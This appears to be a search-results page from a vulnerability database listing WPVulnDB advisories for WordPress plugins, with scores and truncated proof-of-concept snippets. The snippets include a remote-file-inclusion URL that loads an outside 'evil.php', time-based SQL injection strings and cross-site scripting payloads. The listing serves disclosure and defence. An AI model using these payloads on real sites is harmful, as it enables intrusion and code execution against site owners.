Lucene search
K
WpvulndbMost viewed

14602 matches found

WPVulnDB
WPVulnDB
•added 2021/12/05 12:0 a.m.•20 views

Modal Window < 5.2.2 - RFI leading to RCE via CSRF

The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. PoC http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

8.8CVSS1.3AI score0.00773EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/12/01 12:0 a.m.•20 views

Booster for WooCommerce < 5.4.9 - Reflected Cross-Site Scripting in General Module

The plugin does not sanitise and escape the wcjdeleterole parameter before outputting back in the admin dashboard when the General module is enabled, leading to a Reflected Cross-Site Scripting issue PoC The "General" module needs to be enabled in "Woocommerce - Booster Settings - Booster"...

6.1CVSS0.5AI score0.00757EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/11/24 12:0 a.m.•20 views

Hide My WP < 6.2.4 - Unauthenticated Plugin Deactivation

The plugin does not have any authorisation check when outputing a reset token, which could then be used to deactivate the plugin via another request...

7.5CVSS2.8AI score0.01941EPSS
Exploits1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/11/22 12:0 a.m.•20 views

Icegram < 2.0.5 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the messageid parameter of the getmessageactionrow AJAX action before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue PoC The XSS will be triggered when moving the mouse over the text in the response...

6.1CVSS1.6AI score0.008EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/11/18 12:0 a.m.•20 views

Easy Registration Forms <= 2.1.1 - CSRF to Stored Cross-Site Scripting

The plugin is vulnerable to Cross-Site Request Forgery due to missing nonce validation via the ajaxaddform function found in the /includes/class-form.php file which made it possible for attackers to inject arbitrary web scripts in versions up to, and including 2.1.1...

8.8CVSS8.4AI score0.00698EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/11/15 12:0 a.m.•20 views

Pixel Cat Lite < 2.6.2 - CSRF to Stored Cross-Site Scripting

The plugin does not have CSRF check when saving its settings, and did not sanitise as well as escape some of them, which could allow attacker to make a logged in admin change them and perform Cross-Site Scripting attacks PoC...

9CVSS8.3AI score0.00535EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/11/15 12:0 a.m.•20 views

Ultimate NoFollow <= 1.4.8 - Contributor+ Stored Cross-Site Scripting

The plugin does not sanitise and escape the href attribute of its shortcodes, allowing users with a role as low as contributor to perform Cross-Site Scripting attacks PoC Affected shortcodes: nf, nofo, nofol, nofollow, relnofollow As a contributor, put the below shortcode in a post/page nf...

5.4CVSS4.9AI score0.00604EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/11/03 12:0 a.m.•20 views

Cost Calculator <= 1.4 - Contributor+ Local File Inclusion

The plugin allows users with a role as low as Contributor to perform path traversal and local PHP file inclusion on Windows Web Servers via the Cost Calculator post's Layout PoC As a contributor, create a Cost Calculator post, set the Layout to /../../../../../../../../../../file assuming the fil...

2.6AI score0.03EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/11/01 12:0 a.m.•20 views

WP RSS Aggregator < 4.19.2 - Admin+ Stored Cross-Site Scripting

The plugin does not properly sanitise and escape the URL to Blacklist field, allowing malicious HTML to be inserted by high privilege users even when the unfilteredhtml capability is disallowed, which could lead to Cross-Site Scripting issues. PoC Add an URL to Blacklist RSS Aggregator Tools...

4.8CVSS4.9AI score0.00598EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/24 12:0 a.m.•20 views

Logo Showcase with Slick Slider < 1.2.5 - Subscriber+ Arbitrary Media Title/Description/Alt Text/URL Update

The plugin does not have CSRF and authorisation checks in the lswsssaveattachmentdata AJAX action, allowing any authenticated users, such as Subscriber, to change title, description, alt text, and URL of arbitrary uploaded media. PoC jQuery.postajaxurl, action: "lswsssaveattachmentdata",...

1.7AI score0.00339EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/20 12:0 a.m.•20 views

Forminator < 1.15.4 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitize and escape the email field label, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml is disallowed PoC As an admin, create or edit a Forminator form, add an email field and put the following payload in the label...

4.8CVSS1.3AI score0.00598EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/19 12:0 a.m.•20 views

Images to WebP < 1.9 - Multiple Cross Site Request Forgery (CSRF)

The plugin does not have CSRF checks in place when performing some administrative actions, which could result in modification of plugin settings, Denial-of-Service, as well as arbitrary image conversion PoC The PoC varies based on the endpoint targeted. Here is one example that will modify the...

8.1CVSS1.5AI score0.00519EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/18 12:0 a.m.•20 views

Shared Files < 1.6.61 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape the Download Counter Text settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed PoC Put the following payload in the Download Counter Text settings and tick the Show...

4.8CVSS0.6AI score0.00647EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/18 12:0 a.m.•20 views

Leaky Paywall <= 4.16.5 - Admin+ Stored Cross-Site Scripting

The plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via the /class.php file which allowed attackers with administrative user access to inject arbitrary web scripts. This affects multi-site installations where unfilteredhtml is disabled for...

5.5CVSS4.9AI score0.00886EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/18 12:0 a.m.•20 views

Support Board < 3.3.6 - Arbitrary File Deletion via CSRF

The plugin does not have any CSRF checks in actions handled by the include/ajax.php file, which could allow attackers to make logged in users do unwanted actions. For example, make an admin delete arbitrary files PoC...

4.2AI score0.00542EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/18 12:0 a.m.•21 views

QR Redirector < 1.6 - Subscriber+ Arbitrary QR Redirect Response Status Update

The plugin does not have capability and CSRF checks when saving bulk QR Redirector settings via the qrsavebulk AJAX action, which could allow any authenticated user, such as subscriber to change the redirect response status code of arbitrary QR Redirects PoC jQuery.postajaxurl, qrredirectresponse...

4.3CVSS0.9AI score0.00433EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/14 12:0 a.m.•20 views

Job Manager <= 0.7.25 - Admin+ Stored Cross-Site Scripting

The plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the /admin-jobs.php file which allowed attackers with administrative user access to inject arbitrary web scripts. This affects multi-site installations whe...

5.5CVSS4.2AI score0.0088EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/14 12:0 a.m.•20 views

WP Fastest Cache < 0.9.5 - CSRF to Stored Cross-Site Scripting

The plugin is lacking a CSRF check in its wpfcsavecdnintegration AJAX action, and does not sanitise and escape some the options available via the action, which could allow attackers to make logged in high privilege users call it and set a Cross-Site Scripting payload...

4.1AI score0.00252EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/14 12:0 a.m.•20 views

HAL < 2.2 - Admin+ Stored Cross-Site Scripting

The plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the /wp-hal.php file which allowed attackers with administrative user access to inject arbitrary web scripts. This affects multi-site installations where...

5.5CVSS4.2AI score0.00922EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/13 12:0 a.m.•20 views

Brizy < 2.3.12 - Authenticated File Upload and Path Traversal

Using the brizycreateblockscreenshot AJAX action, it was possible to provide a filename using the id parameter, and populate the file contents via the ibsf parameter, which would be base64-decoded and written to the file. While the plugin appended .jpg to all uploaded filenames, a double extensio...

8.8CVSS3.1AI score0.01682EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/13 12:0 a.m.•20 views

WP Cloudy < 4.4.9 - Admin+ SQL Injection

The plugin does not escape the postid parameter before using it in a SQL statement in the admin dashboard, leading to a SQL Injection issue PoC The first digits of the post parameter must be a valid Post ID Weather post or not...

0.3AI score0.01202EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/11 12:0 a.m.•20 views

WP Header Images < 2.0.1 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the t parameter before outputting it back in the plugin's settings page, leading to a Reflected Cross-Site Scripting issue PoC https://example.com/wp-admin/options-general.php?page=wphi=5"...

6.1CVSS0.1AI score0.008EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/11 12:0 a.m.•20 views

Quiz Tool Lite <= 2.3.15 - Multiple Admin+ Stored Cross-Site Scripting

The plugin does not sanitize multiple input fields used when creating or managing quizzes and in other setting options, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. PoC 1. When creating a new Question Pot, you can...

4.8CVSS0.7AI score0.00598EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/11 12:0 a.m.•20 views

wpDiscuz < 7.3.4 - Arbitrary Comment Addition/Edition/Deletion via CSRF

The plugin does check for CSRF when adding, editing and deleting comments, which could allow attacker to make logged in users such as admin edit and delete arbitrary comment, or the user who made the comment to edit it via a CSRF attack. Attackers could also make logged in users post arbitrary...

4.3CVSS3.9AI score0.00467EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/07 12:0 a.m.•20 views

Post Content XMLRPC <= 1.0 - Admin+ SQL Injections

The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to an authenticated SQL Injections PoC https://example.com/wp-admin/admin.php?page=pcxaddsites=add=1%20AND%20SELECT%207953%20FROM%20SELECTSLEEP5AgUn...

7.2CVSS0.8AI score0.01497EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/06 12:0 a.m.•20 views

Access Demo Importer < 1.0.7 - Subscriber+ Arbitrary File Upload

Versions up to, and including, 1.0.6, of the Access Demo Importer WordPress plugin are vulnerable to arbitrary file uploads via the pluginofflineinstaller AJAX action due to a missing capability check in the pluginofflineinstallercallback functionfound in the /inc/demo-functions.php file along wi...

8.8CVSS1.7AI score0.01652EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/05 12:0 a.m.•20 views

Perfect Survey < 1.5.2 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape multiple parameters id and filterssessionid of singlestatistics page, type and message of importexport page before outputting them back in pages/attributes in the admin dashboard, leading to Reflected Cross-Site Scripting issues PoC...

0.7AI score0.008EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/05 12:0 a.m.•20 views

Simple Download Monitor < 3.9.5 - Reflected Cross-Site Scripting

The plugin does not escape the 1 sdmactivetab GET parameter and 2 sdmstatsstartdate/sdmstatsenddate POST parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues PoC PoC 1: This requires Firefox due to onclick+accesskey trick on hidden input. There is...

6.1CVSS0.4AI score0.008EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/10/04 12:0 a.m.•20 views

Paypal Donation < 1.3.1 - CSRF to Stored Cross-Site Scripting

The plugin offers a function to create donation buttons, which internally are posts. The process to create a new button is lacking a CSRF check. An attacker could use this to make an authenticated admin create a new button. Furthermore, one of the Button field is not escaped before being output i...

4.3CVSS1.5AI score0.00487EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/29 12:0 a.m.•20 views

Credova_Financial < 1.4.9 - Sensitive Information Disclosure

The plugin discloses a site’s associated Credova API account username and password in plaintext via an AJAX action whenever a site user goes to checkout on a page that has the Credova Financing option enabled...

7.5CVSS2.2AI score0.00742EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/28 12:0 a.m.•20 views

Connections Business Directory < 10.4.3 - Admin+ Stored Cross-Site Scripting

The plugin does not escape the Address settings when creating an Entry, which could allow high privilege users to perform Cross-Site Scripting when the unfilteredhtml capability is disallowed. PoC Add an Entry /wp-admin/admin.php?page=connectionsadd and put the following payload in the Address Li...

4.8CVSS2.1AI score0.00705EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/28 12:0 a.m.•20 views

OG Tags < 2.0.2 - Plugin's Settings Update via CSRF

The plugin is lacking a CSRF check when saving its settings, which could allow attackers to make a logged in admin change them via a CSRF attack...

8.8CVSS4.4AI score0.00716EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/27 12:0 a.m.•20 views

Permalink Manager Lite < 2.2.13.1 - Admin+ SQL Injection

The plugin does not validate and escape the orderby parameter before using it in a SQL statement in the Permalink Manager page, leading to a SQL Injection PoC https://example.com/wp-admin/tools.php?page=permalink-manager=ID+AND+SELECT+9480+FROM+SELECTSLEEP5EXid...

7.2CVSS0.8AI score0.01336EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/27 12:0 a.m.•20 views

Great Quotes <= 1.0.0 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape the Quote and Author fields of its Quotes, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml is disallowed. PoC Add/edit a Quote and put the following payload in the "Quote" and "Author" fields:...

4.8CVSS3AI score0.00598EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/27 12:0 a.m.•20 views

Visual Form Builder < 3.0.4 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise or escape its Form Name, allowing high privilege users such as admin to set Cross-Site Scripting payload in them, even when the unfilteredhtml capability is disallowed PoC Create a new Form via the plugin, fill it with any values. In the next step, change the Form nam...

4.8CVSS1.7AI score0.00598EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/21 12:0 a.m.•20 views

Responsive WordPress Slider <= 2.2.0 - Subscriber+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some of the Slider options, allowing Cross-Site Scripting payloads to be set in them. Furthermore, as by default any authenticated user is allowed to create Sliders https://wordpress.org/support/topic/slider-can-be-changed-from-any-user-even-subscriber/, su...

5.4CVSS5.4AI score0.006EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/20 12:0 a.m.•20 views

One User Avatar < 2.3.7 - Contributor+ Stored Cross-Site Scripting

The plugin does not escape the link and target attributes of its shortcode, allowing users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks PoC avatar link="javascript:alertorigin" avatar target='" style="animation-name:twentytwentyone-close-button-transition"...

5.4CVSS3.5AI score0.00629EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/20 12:0 a.m.•20 views

WP Cookie Choice <= 1.1.0 - CSRF to Stored Cross-Site Scripting

The plugin is lacking any CSRF check when saving its options, and do not escape them when outputting them in attributes. As a result, an attacker could make a logged in admin change them to arbitrary values including XSS payloads via a CSRF attack. PoC...

6.5CVSS2AI score0.00509EPSS
Exploits1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/20 12:0 a.m.•20 views

One User Avatar < 2.3.7 - Avatar Update via CSRF

The plugin does not check for CSRF when updating the Avatar in page where the avatarupload shortcode is embed. As a result, attackers could make logged in user change their avatar via a CSRF attack PoC Click POST /one-user-avatar-avatar-upload/ HTTP/1.1 Accept:...

6.5CVSS3AI score0.00553EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/20 12:0 a.m.•20 views

Wechat Reward <= 1.7 - CSRF to Stored Cross-Site Scripting

The plugin does not sanitise or escape its QR settings, nor has any CSRF check in place, allowing attackers to make a logged in admin change the settings and perform Cross-Site Scripting attacks. PoC Put the following payload in the QR setting: " The XSS will be triggered in the plugin's setting...

5.4CVSS3.4AI score0.00382EPSS
Exploits1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/09 12:0 a.m.•20 views

Post Title Counter <= 1.1 - Reflected Cross-Site Scripting

The plugin is vulnerable to Reflected Cross-Site Scripting via the notice parameter found in the /post-title-counter.php file which allows attackers to inject arbitrary web scripts...

6.1CVSS4.7AI score0.00895EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/09 12:0 a.m.•20 views

DJ EmailPublish <= 1.7.2 - Reflected Cross-Site Scripting

The plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $SERVER"PHPSELF" value in the /dj-email-publish.php file which allows attackers to inject arbitrary web scripts...

6.1CVSS3.9AI score0.00895EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/09 12:0 a.m.•20 views

WooCommerce Payment Gateway Per Category <= 2.0.10 - Reflected Cross-Site Scripting

The plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $SERVER"PHPSELF" value in the /includes/pluginsettings.php file which allows attackers to inject arbitrary web scripts...

6.1CVSS4.5AI score0.00938EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/09 12:0 a.m.•20 views

OSD Subscribe <= 1.2.3 - Reflected Cross-Site Scripting

The plugin is vulnerable to Reflected Cross-Site Scripting via the osdsubscribemessage parameter found in the /options/osdsubscribeoptionssubscribers.php file which allows attackers to inject arbitrary web scripts...

6.1CVSS4.6AI score0.00895EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/09 12:0 a.m.•20 views

Simple Matted Thumbnails <= 1.01 - Reflected Cross-Site Scripting

The plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $SERVER"PHPSELF" value in the /simple-matted-thumbnail.php file which allows attackers to inject arbitrary web scripts...

6.1CVSS4AI score0.00895EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/09 12:0 a.m.•20 views

On Page SEO + Whatsapp Chat Button < 1.0.2 - Reflected Cross-Site Scripting

The plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $SERVER"PHPSELF" value in the /settings.php file which allows attackers to inject arbitrary web scripts...

6.1CVSS3.9AI score0.00895EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/08 12:0 a.m.•20 views

Konnichiwa! Membership <= 0.8.3 - Reflected Cross-Site Scripting

The plugin is vulnerable to Reflected Cross-Site Scripting via the planid parameter in the /views/subscriptions.html.php file which allows attackers to inject arbitrary web scripts...

6.1CVSS4.7AI score0.00895EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/08 12:0 a.m.•20 views

WP Academic People List <= 0.4.1 - Reflected Cross-Site Scripting

The plugin is vulnerable to Reflected Cross-Site Scripting via the categoryname parameter in the /admin-panel.php file which allows attackers to inject arbitrary web scripts...

6.1CVSS4.8AI score0.00938EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/09/07 12:0 a.m.•20 views

WP Sitemap Page < 1.7.0 - Admin+ Stored Cross Site Scripting

The plugin does not properly sanitise and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. PoC Put the following payloads in the mentioned settings of the plugin: - How to display the...

4.8CVSS0.7AI score0.00622EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
•added 2021/08/23 12:0 a.m.•20 views

Timetable and Event Schedule by MotoPress < 2.4.2 - Unauthorised Event TimeSlot Update

The plugin does not have proper access control when updating a timeslot, allowing any user with the editposts capability contributor+ to update arbitrary timeslot from any events. Furthermore, no CSRF check is in place as well, allowing such attack to be perform via CSRF against a logged in with...

5.4CVSS1.4AI score0.00489EPSS
Exploits2Affected Software1
Total number of security vulnerabilities5000